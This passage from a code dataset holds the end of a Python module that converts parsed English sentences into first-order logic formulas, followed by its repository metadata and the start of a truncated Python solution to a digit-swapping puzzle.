object_is_positive:\n full_object_logic=[\"not\",full_object_logic] \n #debug_print(\"full_object_logic\",full_object_logic) \n all_objects_logic.append(full_object_logic)\n #debug_print(\"all_objects_logic 2\",all_objects_logic)\n \n if all_objects_logic and all_objects_logic[0]==\"single\": \n all_objects_logic=all_objects_logic[1]\n \n #debug_print(\"subj_logic\",subj_logic)\n #debug_print(\"sargument\",sargument)\n #debug_print(\"subjspecialvar\",subjspecialvar)\n #debug_print(\"subjrepr\",subjrepr)\n #debug_print(\"all_objects_logic 3\",all_objects_logic)\n #debug_print(\"subject_quantifier subjrepr\",[subject_quantifier,subjrepr])\n\n if sargument:\n if svar:\n #debug_print(\"is svar\",svar)\n #quantifier=\"forall\" \n #res=[\"logic\",tree,[quantifier,[svar],[subj_logic,\"=>\",all_objects_logic]]] \n quantifier=\"exists\" \n logic=[\"and\",subj_logic,all_objects_logic]\n for fvar in subjvars:\n if fvar!=subjrepr and (not 
is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n logic=[\"exists\",[fvar],logic]\n res=[\"logic\",tree,[quantifier,[svar],logic]] \n else:\n #debug_print(\"not svar\")\n reversepolarity=False\n obj_logic=make_obj_logic(ctxt,sentence,subjrepr,subjpart,verbpart,objpart,False,False,reversepolarity,abs(subj_confidence)) \n logic=[\"and\",subj_logic,all_objects_logic]\n for fvar in subjvars:\n if fvar!=subjrepr and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n logic=[\"exists\",[fvar],logic]\n for fvar in subjvars:\n if fvar!=subjrepr and (not is_keep_free_var(ctxt,fvar)): # and (not svar or fvar!=svar):\n logic=[\"exists\",[fvar],logic] \n res=[\"logic\",tree,logic] \n elif not subjspecialvar: \n if subject_quantifier==\"exists\": # and (not ctxt[\"isquestion\"]):\n res=[subject_quantifier,[subjrepr],[\"and\",subj_logic,all_objects_logic]] \n elif iscondition or subjispronoun: # or ctxt[\"isquestion\"]: \n if (subject_quantifier==\"forall\" and subject and not(subjispronoun) and word_has_feat(subject,\"Number\",\"Plur\") and\n ((not subject_quant and not subject_det) or\n (subject_quant and subject_quant[\"lemma\"] in [\"all\",\"every\",\"each\"]))):\n quantifier=\"forall\"\n res=[subj_logic,\"=>\",all_objects_logic]\n else:\n res=[\"and\",subj_logic,all_objects_logic]\n elif subjconst: \n res=[\"and\",subj_logic,all_objects_logic] \n else: \n res=[subject_quantifier,[subjrepr],[subj_logic,\"=>\",all_objects_logic]] \n elif subject_quantifier==\"exists\" and subjrepr and unknownsubject in subjrepr:\n # Colin is wounded\n quantifier=\"exists\" \n res=[\"logic\",tree,all_objects_logic] \n else: \n res=[subj_logic,\"=>\",all_objects_logic]\n \n res=prop_flatten_logic_term(res)\n logic=simplify_quantors(res)\n if iscondition: \n logic=remove_confidence_annotations(ctxt,res)\n #debug_print(\"general case returns logic\",logic) \n return logic\n\n\ndef is_concrete_thing(ctxt,sentence,object,object_det,verb,iscondition,isconsequence,isobject=False,prefer_non_concrete=False):\n #debug_print(\"is_concrete_thing object iscondition isconsequence\",[object,iscondition,isconsequence])\n #debug_print(\"is_concrete_thing verb\",verb)\n #debug_print(\"is_concrete_thing object_det\",object_det)\n #debug_print(\"is_concrete_thing isobject\",isobject)\n #debug_print(\"is_concrete_thing prefer_non_concrete\",prefer_non_concrete)\n if not object: return False\n\n #if object[\"lemma\"] in [\"woman\"]: return False\n\n if type(object)==dict and \"argument\" in object:\n argument=object[\"argument\"]\n argument_det=get_word_det(ctxt,sentence,argument)\n #debug_print(\"argument\",argument)\n #debug_print(\"argument_det\",argument_det)\n is_concrete_argument=is_concrete_thing(ctxt,sentence,argument,argument_det,\n verb,iscondition,isconsequence,isobject,prefer_non_concrete=prefer_non_concrete) \n #debug_print(\"is_concrete_argument\", is_concrete_argument) \n if is_concrete_argument and (object_det and object_det[\"lemma\"] in [\"the\"]):\n #debug_print(\"concrete argument-having object v1\")\n return True\n elif is_concrete_argument and (object[\"upos\"] in [\"NOUN\"] and object[\"lemma\"] in measure_words):\n #debug_print(\"concrete argument-having object v2\")\n return True \n elif ((object[\"lemma\"] in measure_words) and\n \"preposition\" in argument and argument[\"preposition\"] in [\"'s\"]):\n #debug_print(\"concrete argument-having object v3\")\n return True \n else:\n #debug_print(\"non-concrete argument-having object\")\n return False\n if (type(object)==dict and \n 
((object[\"upos\"] in [\"PROPN\"] and (\"ner\" not in object or object[\"ner\"] not in [\"NORP\",\"S-NORP\"])) or \n (ctxt[\"isquestion\"] and object[\"lemma\"] in [\"whom\",\"who\",\"what\"]))):\n # also \"Whom is Ellen afraid of?\" where whom is pron, while \"who\" would be propn \n return True\n #elif (type(object)==dict and \n # (ctxt[\"isquestion\"] and object[\"lemma\"] in [\"whom\",\"who\",\"what\"])):\n # # also \"Whom is Ellen afraid of?\" where whom is pron, while \"who\" would be propn \n # debug_print(\"cpz object\",object) \n # return False \n elif (type(object)==dict and is_measure_unit(ctxt,object[\"lemma\"]) and \n word_has_child_in_deprel_upos(ctxt,sentence,object,[\"nummod\"],[\"NUM\"])):\n #debug_print(\"found measure object\",object) \n return True\n elif not object_det: \n #debug_print(\"no object_det\") \n if object[\"upos\"] in [\"NOUN\"] and verb and verb_in_past(ctxt,sentence,verb):\n # Nails are made of metal\n if (\"be\" in verb) and not verb_in_past(ctxt,sentence,verb[\"be\"]):\n return False\n #elif prefer_non_concrete:\n # return False \n else: \n return True\n #elif verb and verb[\"lemma\"] in [\"be\"]:\n # return \n elif type(object)==dict and \"ner\" in object and object[\"ner\"] in [\"S-DATE\"]:\n return True\n else: \n return False \n if ((iscondition or isconsequence or ctxt[\"isquestion\"]) and object_det and object_det[\"lemma\"] in [\"the\"]): \n # the (iscondition or or ctxt[\"isquestion\"]) prohibits OK answer to: \n # \"John is a man Mary liked. Mary liked the man?\"\n # initially for general case object we had: not ctxt[\"isquestion\"]:\n return True\n else:\n if isobject and verb and verb[\"lemma\"] in [\"have\"]:\n if ((not (iscondition or isconsequence or ctxt[\"isquestion\"])) and object_det[\"lemma\"] in [\"the\"]) :\n if find_existing_object(ctxt,sentence,object):\n return True \n else:\n return False \n elif ((not (iscondition or isconsequence or ctxt[\"isquestion\"])) and object_det[\"lemma\"] in [\"a\",\"an\",\"another\",\"the\"]) : \n if prefer_non_concrete:\n if object_det[\"lemma\"] in [\"a\",\"an\"]:\n return False\n else:\n return True \n else:\n return True\n return False \n\ndef is_measure_unit(ctxt,lemma):\n #debug_print(\"lemma\",lemma)\n for el in measure_words:\n if \"units\" in measure_words[el] and lemma in measure_words[el][\"units\"]:\n return True\n #debug_print(\"False\",False) \n return False\n\n\ndef determine_act_main_type(ctxt,sentence,subject,verb,object):\n #debug_print(\"determine_act_main_type subject verb object\",[subject,verb,object])\n if has_aux_from_list(sentence,verb,[\"can\"]):\n res=\"can\"\n else: \n subject_det=get_word_det(ctxt,sentence,subject) \n if subject_det in [\"the\",\"a\",\"an\",\"this\",\"these\"]:\n res=\"act\"\n elif word_has_feat(verb,\"VerbForm\",\"Inf\"): \n if (verb_in_past(ctxt,sentence,verb) or\n ((\"be\" in verb) and (verb[\"be\"][\"lemma\"]==\"be\"))):\n # The radio is working\n res=\"act\"\n else: \n res=\"do\" \n elif verb_in_past(ctxt,sentence,verb): \n res=\"act\"\n elif not (word_has_feat(verb,\"Tense\",\"Pres\")): \n res=\"act\"\n else:\n res=\"do\" \n # debug_print(\"determine_act_main_type res\",res)\n return res\n\n\ndef make_action_prop_logic(ctxt,sentence,verb,actionvar,subject,subjrepr,tree,verb_is_positive,subject_is_concrete):\n #debug_print(\"make_action_prop_logic starts ------------------\")\n #debug_print(\"make_action_prop_logic verb\",verb)\n #debug_print(\"make_action_prop_logic actionrepr\",actionvar)\n #debug_print(\"make_action_prop_logic subject\",subject)\n 
#debug_print(\"make_action_prop_logic subjrepr\",subjrepr) \n #debug_print(\"make_action_prop_logic subject_is_concrete\",subject_is_concrete)\n \n if (\"relation\" in verb) and verb[\"relation\"]: return None\n if verb[\"lemma\"] in [\"be\"]: return None\n\n orig_isquestion=ctxt[\"isquestion\"]\n #ctxt[\"isquestion\"]=False\n\n andlist=[]\n listop=\"and\"\n verbchildren=get_children(sentence,verb)\n for child in verbchildren:\n # Bears eat quickly.\n sublist=[]\n sublistop=\"and\"\n proplogic=None\n if (((child[\"deprel\"] in [\"advmod\"] and child[\"upos\"] in [\"ADV\"]) or\n (child[\"deprel\"] in [\"xcomp\"] and child[\"upos\"] in [\"ADJ\"]))\n and\n not child[\"lemma\"] in [\"then\"]):\n positive=True\n proplogic=make_simple_conj_logic(ctxt,sentence,child,actionvar)\n #debug_print(\"make_action_prop_logic proplogic0\",proplogic) \n\n if proplogic: \n sublist.append(proplogic)\n if sublist: \n sublist=[sublistop]+sublist\n andlist.append(sublist)\n if andlist:\n andlist=[listop]+andlist \n #debug_print(\"action_prop_logic andlist 1\",andlist) \n \n sublist2=[]\n if \"relatedobjects\" in verb:\n #debug_print(\"CPXXXX relatedobjects found\")\n relatedobjects=verb[\"relatedobjects\"]\n for el in relatedobjects:\n # Bears eat in a forest \n # check if relatedobject should be used\n # eliminate with-probability\n #debug_print(\"el\",el) \n if (\"case\" in el and el[\"case\"][\"lemma\"] in [\"with\"] and\n \"obj\" in el):\n if el[\"obj\"][\"lemma\"] in probability_words: continue\n has_probability=False\n for child in verbchildren:\n if child[\"deprel\"] in [\"obl\"] and child[\"lemma\"] in probability_words:\n has_probability=True\n break\n if has_probability and el[\"obj\"][\"lemma\"] in [\"percent\"]: \n continue \n\n # ok, should be used\n\n positive=True\n actionobjectvar=\"?:AO\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n\n objpart=el[\"proplogic\"]\n #debug_print(\"objpart\",objpart)\n object_data=make_object_data(ctxt,sentence,objpart)\n #debug_print(\"object_data\",object_data)\n object=get_thing(objpart)\n objspecialvar=None\n objconst=None \n object_det=get_word_det(ctxt,sentence,object)\n object_quant=get_word_quant(ctxt,sentence,object)\n\n parent_object_pair=None\n iscondition=False\n isconsequence=False\n subjpart=None\n verbpart=verb\n\n #debug_print(\"object\",object)\n #debug_print(\"parent_object_pair\",parent_object_pair)\n objspecialvar=None\n objconst=None \n object_det=get_word_det(ctxt,sentence,object)\n\n if object:\n if not(type(object_data)==list and object_data[0] in [\"and\",\"or\",\"nor\",\"xor\"]):\n object_data=[\"single\",object_data]\n if object_quant and object_quant[\"lemma\"] in [\"some\"]:\n object_quantifier=\"exists\"\n elif object_quant and object_quant[\"lemma\"] in [\"all\",\"every\",\"each\"]: #,\"most\"]:\n object_quantifier=\"forall\" \n else: \n object_quantifier=\"exists\" \n else:\n object_data=[\"single\",\"$dummy_act_object\"] \n object_quantifier=None\n obj_logic=None\n objrepr=None\n #debug_print(\"object_data2\",object_data) \n \n prefernonconcrete=True\n if subject_is_concrete: prefernonconcrete=False\n\n if parent_object_pair and object==parent_object_pair[1]:\n #John had a car which Eve bought\n #Bears who eat fish are strong\n objrepr=parent_object_pair[0]\n elif pronoun(ctxt,object):\n tmp=resolve_pronoun(ctxt,sentence,object,tree,verb,subject)\n #debug_print(\"ctxt[objects] after resolve_pronoun of general handling\",ctxt[\"objects\"])\n if not tmp:\n print(\"error: cannot resolve pronoun, case 4\",object)\n sys.exit(0)\n return 
None\n object=tmp[1]\n objrepr=tmp[0]\n #objispronoun=True\n elif object and type(object)==dict and variable_shaped_lemma(object[\"lemma\"]):\n ovar=\"?:\"+object[\"text\"]\n objspecialvar=ovar \n objrepr=objspecialvar\n elif object and type(object)==dict and object[\"upos\"] in [\"PROPN\"]:\n objconst=find_make_constant(ctxt,sentence,object)\n objrepr=objconst\n elif is_concrete_thing(ctxt,sentence,object,object_det,verb,iscondition,isconsequence,isobject=True,prefer_non_concrete=True): \n tmp_logic=make_obj_logic(ctxt,sentence,dummysubject,subjpart,verbpart,objpart) \n #debug_print(\"tmp_logic 0\",tmp_logic)\n tmp_logic=prop_flatten_logic_term(tmp_logic) \n #debug_print(\"object\",object)\n #debug_print(\"object_det\",object_det)\n #debug_print(\"tmp_logic\",tmp_logic)\n objconst=make_determined_constant(ctxt,sentence,object,object_det,tmp_logic,verb)\n #debug_print(\"objconst\",objconst)\n objrepr=objconst \n object_quantifier=None \n else:\n #debug_print(\"object is not concrete\") \n ovar=\"?:O\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n objrepr=ovar \n if parent_object_pair and objrepr==parent_object_pair[0]:\n object_quantifier=None \n \n actionrepr=\"?:A\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n \n if not objrepr:\n object_is_positive=True\n else:\n #debug_print(\"obj_logic1\",obj_logic) \n #debug_print(\"about to call obj_logic\") \n\n obj_logic=make_simple_obj_logic(ctxt,sentence,objrepr,subjpart,verbpart,objpart,actionrepr)\n #debug_print(\"ctxt[objects] after make_simple_obj_logic of general handling\",ctxt[\"objects\"])\n #debug_print(\"obj_logic of general handling\",obj_logic) \n if obj_logic and type(obj_logic)==list and obj_logic[0]==\"not\":\n obj_logic=obj_logic[1]\n\n if ((not ctxt[\"isquestion\"]) and (not iscondition) and (not isconsequence) and\n objrepr):\n update_ctxt_objects(ctxt,objrepr,object,obj_logic) \n\n #debug_print(\"obj_logic2\",obj_logic)\n obj_logic_function=make_logic_counted_function(ctxt,sentence,obj_logic,objrepr,\n object,verb,subject,isobject=True,noplural=(iscondition or not verb_is_positive))\n #debug_print(\"obj_logic_function\",obj_logic_function)\n if obj_logic_function and obj_logic_function[0]:\n objsetrepr=[set_function,obj_logic_function[1],subjrepr]\n countatom=logic_replace_el(obj_logic_function[0],objrepr,objsetrepr)\n #debug_print(\"objsetrepr 2\",objsetrepr)\n #debug_print(\"countatom\",countatom)\n\n else:\n objsetrepr=None \n\n #debug_print(\"new obj_logic\",obj_logic) \n #debug_print(\"new objrepr\",objrepr) \n #debug_print(\"new objsetrepr\",objsetrepr) \n\n proplogic=obj_logic\n\n #debug_print(\"child\",child)\n #childchildren=get_children(sentence,child)\n relword=el[\"case\"]\n actionobjectvar=objrepr \n \n if relword: \n if (relword[\"lemma\"] in [\"by\"] and\n actionobjectvar==subjrepr):\n # The car was bought by Mary?\n proplogic=None \n elif (relword[\"lemma\"] in [\"by\"]): \n # The car was bought by Mary?\n objrelation=make_atom_2(ctxt,sentence,verb,verb,positive,subjrepr,actionobjectvar,1) \n proplogic=[\"and\",proplogic,objrelation] \n else:\n objrelation=make_atom_2(ctxt,sentence,verb,relword,positive,actionvar,actionobjectvar,1,\"rel2\") \n #debug_print(\"objrelation\",objrelation)\n proplogic=[\"and\",proplogic,objrelation]\n\n if proplogic: \n if not objspecialvar:\n if object_quantifier:\n proplogic=[object_quantifier,[objrepr],proplogic]\n sublist2.append(proplogic)\n\n #debug_print(\"action_prop_logic sublist2\",sublist2) \n if sublist2:\n andlist2=sublist2\n andlist2=[listop]+andlist2 \n else:\n 
andlist2=None \n #debug_print(\"action_prop_logic andlist2\",andlist2) \n\n if andlist and andlist2:\n res=[\"and\",andlist,andlist2]\n elif andlist:\n res=andlist\n elif andlist2:\n res=andlist2 \n else:\n #debug_print(\"make_action_prop_logic ends with None ------------------\")\n ctxt[\"isquestion\"]=orig_isquestion\n return None \n \n res=prop_flatten_logic_term(res)\n freevars=collect_free_vars(res)\n bindvars=[]\n for var in freevars:\n if var[2:].startswith(\"O\"):\n #debug_print(\"var\",var)\n bindvars.append(var)\n if bindvars:\n res=[\"exists\",bindvars,res] \n ctxt[\"isquestion\"]=orig_isquestion\n #debug_print(\"make_action_prop_logic res\",res)\n #debug_print(\"make_action had actionvar,subject,subjrepr\",(actionvar,subject,subjrepr))\n #debug_print(\"make_action_prop_logic ended ------------------\")\n return res \n\n\n\ndef make_qualified_atom_1(ctxt,sentence,verb,thing,positive,var,confidence=1,act_type=None,actionrepr=None,propclass=None,blocker_preferred=None): \n res1=make_atom_1(ctxt,sentence,verb,thing,positive,var,confidence,act_type,actionrepr,propclass,blocker_preferred)\n return res1\n\n\ndef make_atom_1(ctxt,sentence,verb,thing,positive,var,confidence=1,act_type=None,actionrepr=None,propclass=None,blocker_preferred=None):\n #debug_print(\"make_atom_1 thing\",thing)\n #debug_print(\"make_atom_1 var\",var)\n #debug_print(\"make_atom_1 type(var)\",type(var))\n #debug_print(\"make_atom_1 thing\",thing)\n #debug_print(\"make_atom_1 type(thing)\",type(thing))\n #debug_print(\"make_atom_1 propclass\",propclass)\n #debug_print(\"make_atom_1 ctxt\",ctxt)\n #debug_print(\"make_atom_1 blocker_preferred\",blocker_preferred)\n if not thing: return None\n if type(thing)==list:\n # John has three nice or big cars.\n # not OK!!! Just a temporary hack for or!!\n thing=thing[1]\n lemma=thing[\"lemma\"] \n else: \n lemma=thing[\"lemma\"]\n\n if (\"isquestion\" in ctxt and ctxt[\"isquestion\"] and \n thing[\"lemma\"] in question_words or (propclass and propclass[\"lemma\"] in question_words)):\n question_thing=True\n else:\n question_thing=False \n #debug_print(\"make_atom_1 question_thing\",question_thing)\n\n if act_type: \n pred=act_type \n elif thing[\"upos\"] in [\"VERB\"]:\n pred=\"act1\" \n elif ((thing[\"upos\"] in [\"PROPN\"]) and\n ((not (\"ner\" in thing )) or not (thing[\"ner\"] in [\"S-NORP\"]))):\n pred=\"has_name\"\n return None\n elif ((thing[\"upos\"] in [\"NOUN\"]) or\n ((thing[\"upos\"] in [\"PROPN\"]) and (\"ner\" in thing ) and (thing[\"ner\"] in [\"S-NORP\"]))):\n pred=\"isa\" \n elif thing[\"upos\"] in [\"NUM\"]:\n pred=\"count\" \n else:\n pred=\"prop\"\n degree=2 \n \n #debug_print(\"pred\",pred)\n if type(lemma)==str and pred==\"prop\":\n lemma=lemma.lower() \n elif pred==\"count\":\n lemma=make_number_from_str(lemma) \n var=[\"$count\",var] \n comp=get_comparison_indicator(ctxt,sentence,thing)\n #debug_print(\"comp\",comp)\n #comp=\"$greater\"\n if comp==\"$greater\":\n pred=comp\n elif comp==\"$less\":\n pred=comp\n else: \n pred=\"=\"\n\n if not positive:\n pred=\"-\"+pred \n\n prop_intensity=default_prop_intensity\n #debug_print(\"propclass\",propclass)\n prop_class=default_prop_class \n if (\"isquestion\" in ctxt and ctxt[\"isquestion\"] and \n (not propclass or question_thing)):\n prop_class=fully_free_variable #unknown_value \n elif not propclass:\n None\n elif propclass and type(propclass)!=dict:\n None \n elif (not (propclass[\"lemma\"] in [\"who\",\"that\",\"which\"]) and\n lemma in class_prop_words): \n prop_class=propclass[\"lemma\"]\n elif 
(propclass[\"lemma\"] in [\"who\",\"that\",\"which\"] and\n lemma in class_prop_words): \n previous=get_previous_word(sentence,propclass)\n if previous and previous[\"upos\"] in [\"NOUN\"]: \n prop_class=previous[\"lemma\"] \n \n children=get_children(sentence,thing)\n if children:\n for child in children:\n if child[\"deprel\"] in [\"advmod\"] and child[\"upos\"] in [\"ADV\"]:\n if child[\"lemma\"] in maximize_prop_words:\n prop_intensity=max_prop_intensity\n elif child[\"lemma\"] in minimize_prop_words:\n prop_intensity=min_prop_intensity \n if pred in [\"$greater\",\"$less\",\"-$greater\",\"-$less\"]:\n res=[pred,var,lemma]\n else: \n res=[pred,lemma,var]\n if pred in [\"prop\",\"-prop\"]:\n res.append(prop_intensity)\n res.append(prop_class) \n if blocker_preferred==None: blocker_preferred=False\n if confidence!=None and ctxt[\"confidences\"]:\n res.append([confidence_function,confidence,blocker_preferred])\n elif blocker_preferred:\n res.append([confidence_function,1,blocker_preferred])\n\n if actionrepr:\n res.append(actionrepr) \n #debug_print(\"make_atom_1 res\",res) \n \n if not (pred in [\"=\",\"!=\",\"isa\",\"-isa\",\"$greater\",\"$less\",\"-$greater\",\"-$less\"]) and ctxt[\"addctxt\"]:\n ctxtargument=make_ctxt_argument(ctxt,sentence,verb,thing)\n res.append(ctxtargument)\n #debug_print(\"make_atom_1 res\",res) \n #print(\"make_atom_1 res\",res) \n return res\n\ndef make_atom_2(ctxt,sentence,verb,thing,positive,var1,var2,confidence=1,act_type=None,actionrepr=None,blocker_preferred=None): \n #debug_print(\"make_atom_2 verb\",verb)\n #debug_print(\"make_atom_2 thing\",thing)\n #debug_print(\"make_atom_2 positive\",positive)\n #ebug_print(\"make_atom_2 var1 var2\",[var1,var2])\n reversepos=False\n lemma=thing[\"lemma\"]\n if \"relation\" in thing:\n relation_type=thing[\"relation\"]\n elif (verb[\"lemma\"]==\"be\" and \"relatedobjects\" in verb and \n verb[\"relatedobjects\"][0][\"case\"][\"lemma\"]==\"of\"):\n # Elephants are afraid of mice \n relation_type=\"of\" \n lemma=thing[\"lemma\"] #\"afraid\" #verb[\"relatedobjects\"][0][\"case\"][\"lemma\"]\n else:\n relation_type=\"\" \n \n #debug_print(\"make_atom_2 thing\",thing)\n #debug_print(\"make_atom_2 lemma\",lemma) \n #debug_print(\"make_atom_2 raw relation_type\", relation_type) \n \n if relation_type and relation_type in nlpglobals.relation_type_translate:\n relation_type=nlpglobals.relation_type_translate[relation_type]\n elif not relation_type:\n if lemma in nlpglobals.relation_type_translate:\n relation_type=nlpglobals.relation_type_translate[lemma]\n act_type=None\n actionrepr=None\n elif lemma in nlpglobals.relation_type_reverse_translate: \n reversepos=True\n relation_type=nlpglobals.relation_type_reverse_translate[lemma] \n act_type=None\n actionrepr=None\n\n if relation_type in nlpglobals.relation_type_negative_translate:\n relation_type=nlpglobals.relation_type_negative_translate[relation_type]\n positive=not positive\n\n #debug_print(\"make_atom_2 translated relation_type\", relation_type) \n \n if relation_type or lemma in [\"have\"]:\n pred=\"rel2\"\n elif act_type:\n pred=act_type \n else:\n pred=\"act2\" \n\n if positive:\n None #pred=\"rel2\"\n else:\n pred=\"-\"+pred #\"-rel2\" \n\n if relation_type in [\"of\",\"than\",\"for\"]: \n pred=pred+\"_\"+relation_type \n elif relation_type:\n lemma=relation_type \n\n if blocker_preferred==None: blocker_preferred=False\n\n if reversepos: \n res=[pred,lemma,var2,var1] \n else: \n res=[pred,lemma,var1,var2] \n #(\"res2\",res)\n comparison_pred=False\n\n 
comp=get_comparison_indicator(ctxt,sentence,thing)\n #debug_print(\"comp\",comp)\n\n #debug_print(\"pred\",pred)\n #debug_print(\"var1\",var1)\n #debug_print(\"var2\",var2)\n #debug_print(\"res\",res)\n \n if (pred in [\"rel2_than\"] and comp and\n (type(var1)==list and var1[0] in [measure_function+\"1\"] or\n type(var2)==list and var2[0] in [measure_function+\"1\"])):\n if var1[1] in [\"length\"]:\n #debug_print(\"length detected\")\n newpred=comp\n res=[newpred,[count_function,res[2]],[count_function,res[3]]] \n return res\n\n if (pred in [\"rel2_than\",\"do2\",\"act2\"] and \n type(var1)==list and var1[0] in [measure_function+\"1\"] and\n type(var2)==list and var2[0] in [measure_function+\"1\"]):\n newpred=None\n for el in measure_words:\n if \"morenouns\" in el and lemma in el[\"morenouns\"]:\n newpred=\"$greater\"\n break\n elif \"lessnouns\" in el and lemma in el[\"lessnouns\"]:\n newpred=\"$less\"\n break \n if lemma in comparison_words:\n if \"less\" in comparison_words[lemma] and comparison_words[lemma][\"less\"]:\n newpred=\"$less\"\n elif \"more\" in comparison_words[lemma] and comparison_words[lemma][\"more\"]:\n newpred=\"$greater\"\n elif \"equal\" in comparison_words[lemma] and comparison_words[lemma][\"equal\"]:\n newpred=\"=\" \n if newpred: \n comparison_pred=newpred \n res=[newpred,[count_function,res[2]],[count_function,res[3]]] \n #debug_print(\"res3\",res)\n\n if confidence!=None and ctxt[\"confidences\"]:\n res.append([confidence_function,confidence,blocker_preferred])\n elif blocker_preferred:\n res.append([confidence_function,1,blocker_preferred])\n\n if actionrepr and not comparison_pred and not (pred in [\"rel2\",\"-rel2\"]): #,\"rel2_of\",\"-rel2_of\",\"rel2_than\",\"-rel2_than\"]):\n res.append(actionrepr)\n\n #debug_print(\"res4\",res) \n if ctxt[\"addctxt\"] and not comparison_pred:\n if not (pred in [\"isa\",\"-isa\"]):\n if thing[\"upos\"]==\"VERB\" and word_has_feat(verb,\"VerbForm\",\"Part\"):\n ctxtargument=make_ctxt_argument(ctxt,sentence,verb,thing)\n else: \n ctxtargument=make_ctxt_argument(ctxt,sentence,verb,thing)\n res.append(ctxtargument) \n if (pred==\"act2\" and positive and confidence>0.9 and \n (not noframes) and (not nonewframes) and (not noframevars)):\n ctxt[\"framenr\"]=ctxt[\"framenr\"]+1 \n return res \n\ndef get_comparison_indicator(ctxt,sentence,thing):\n #debug_print(\"get_comparison_indicator thing\",thing)\n if not thing: return None\n if thing[\"upos\"] in [\"ADJ\"] and is_larger_word(ctxt,sentence,thing):\n return \"$greater\"\n elif thing[\"upos\"] in [\"ADJ\"] and is_smaller_word(ctxt,sentence,thing):\n return \"$less\" \n children=get_children(sentence,thing)\n for child in children:\n if (child[\"deprel\"] in [\"advmod\"] and is_larger_word(ctxt,sentence,child)):\n return \"$greater\"\n if (child[\"deprel\"] in [\"advmod\"] and is_smaller_word(ctxt,sentence,child)):\n return \"$less\" \n parent=get_parent(sentence,thing) \n if not parent: return None\n children=get_children(sentence,parent)\n for child in children:\n if (child[\"deprel\"] in [\"advmod\"] and is_larger_word(ctxt,sentence,child)):\n return \"$greater\"\n if (child[\"deprel\"] in [\"advmod\"] and is_smaller_word(ctxt,sentence,child)):\n return \"$less\" \n return None\n\ndef is_larger_word(ctxt,sentence,word):\n if not word: return False\n if word[\"lemma\"] in larger_words: return True\n return False\n\ndef is_smaller_word(ctxt,sentence,word):\n if not word: return False\n if word[\"lemma\"] in smaller_words: return True\n return False \n\n\n\ndef 
make_ctxt_argument(ctxt,sentence,verb,thing=None):\n #debug_print(\"make_ctxt_argument thing\",thing)\n #debug_print(\"make_ctxt_argument verb\",verb)\n beword=find_related_be_word(ctxt,sentence,verb)\n #debug_print(\"make_ctxt_argument beword\",beword)\n if (thing and verb==thing and type(verb)==dict and beword and\n word_has_feat(verb,\"VerbForm\",\"Part\")): # and word_has_feat(verb,\"Voice\",\"Pass\")):\n #debug_print(\"cp be case 1\")\n # John is defeated\n # John is nice and defeated\n #beword=find_related_be_word(ctxt,sentence,verb)\n #debug_print(\"cp be\",beword)\n #if beword:\n verb=beword \n elif type(verb)==dict and beword and word_has_feat(verb,\"Degree\",\"Cmp\"):\n verb=beword\n elif verb and type(verb)==dict and verb[\"upos\"] in [\"VERB\",\"AUX\"]: #,\"ADJ\"\n #2debug_print(\"cp be case 2\")\n if \"be\" in verb:\n verb=verb[\"be\"]\n #debug_print(\"make_ctxt_argument verb 2\",verb) \n if verb and type(verb)==dict and verb[\"upos\"] in [\"VERB\",\"AUX\"]: \n tensevalue=get_word_feat(verb,\"Tense\")\n #debug_print(\"make_ctxt_argument tensevalue\",tensevalue)\n if not tensevalue: \n if word_has_feat(verb,\"VerbForm\",\"Inf\"):\n children=get_children(sentence,verb)\n for child in children: \n if child[\"deprel\"]==\"aux\" and child[\"lemma\"]==\"do\" and get_word_feat(child,\"Tense\"):\n tensevalue=get_word_feat(child,\"Tense\")\n break\n if not tensevalue: \n tvar=\"?:Tense\"+str(ctxt[\"varnum\"]) \n ctxt[\"varnum\"]+=1\n tensevalue=tvar\n else:\n tvar=\"?:Tense\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n tensevalue=tvar\n\n #debug_print(\"tensevalue\",tensevalue)\n #debug_print(\"thing\",thing)\n\n framenr=ctxt[\"framenr\"]\n if noframes or noframevars: \n None \n elif tensevalue==\"Past\" and (\"isquestion\" in ctxt) and ctxt[\"isquestion\"]:\n framenr=frame_var_prefix+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n ctargument=[ctxt_function,tensevalue,framenr]\n #debug_print(\"ctargument\",ctargument)\n return ctargument\n\ndef find_related_be_word(ctxt,sentence,word):\n #debug_print(\"word\",word)\n if not word or type(word)!=dict: return None\n children=get_children(sentence,word)\n for el in children:\n if el[\"lemma\"]==\"be\" and el[\"upos\"]==\"AUX\":\n return el\n parent=get_parent(sentence,word)\n if parent:\n children=get_children(sentence,parent)\n for el in children:\n if el[\"lemma\"]==\"be\" and el[\"upos\"]==\"AUX\":\n return el\n return None \n\ndef is_keep_free_var(ctxt,var):\n if is_var(var):\n if var.startswith(\"?:Tense\"): return True\n if var.startswith(\"?:Unit\"): return True\n else: return False\n else: return False\n\n\n# =========== the end ==========\n","repo_name":"tammet/nlpsolver","sub_path":"nlpproperlogic.py","file_name":"nlpproperlogic.py","file_ext":"py","file_size_in_byte":69142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2323111574","text":"class Solution(object):\n def maximumSwap(self, num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n counter = [0] * 10\n snum = str(num)\n lnum = len(snum)\n for d in map(int, snum):\n counter[d] += 1\n for i, d in enumerate(map(int, snum)):\n for di in xrange(9, d, -1):\n if counter[di] > 0:\n for j in xrange(lnum - 1, i, -1):\n if int(snum[j]) == di:\n return int(snum[:i] + snum[j] + snum[i + 1:j] + snum[i] + snum[j + 1:])\n counter[d] -= 1\n return 
